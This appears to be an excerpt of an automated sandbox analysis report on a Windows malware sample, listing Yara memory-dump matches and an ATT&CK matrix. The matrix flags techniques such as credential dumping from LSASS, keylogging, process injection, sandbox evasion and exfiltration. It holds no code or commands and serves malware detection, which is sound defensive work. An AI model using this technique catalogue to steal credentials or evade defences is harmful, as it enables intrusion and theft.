                Source: Yara match; File source: 4.2.hh01FRs81x.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000004.00000002.1315969342.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1315269021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3336185788.0000000004540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000E.00000002.3338322375.0000000004E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3336234747.0000000004590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3334175533.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1317262087.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3336041844.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 2 Windows Service | 2 Windows Service | 1 Masquerading | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 412 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 121 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 412 Process Injection | NTDS | 41 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | 112 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph: ID: 1634560; Sample: hh01FRs81x.exe; Startdate: 11/03/2025; Architecture: WINDOWS; Score: 100]
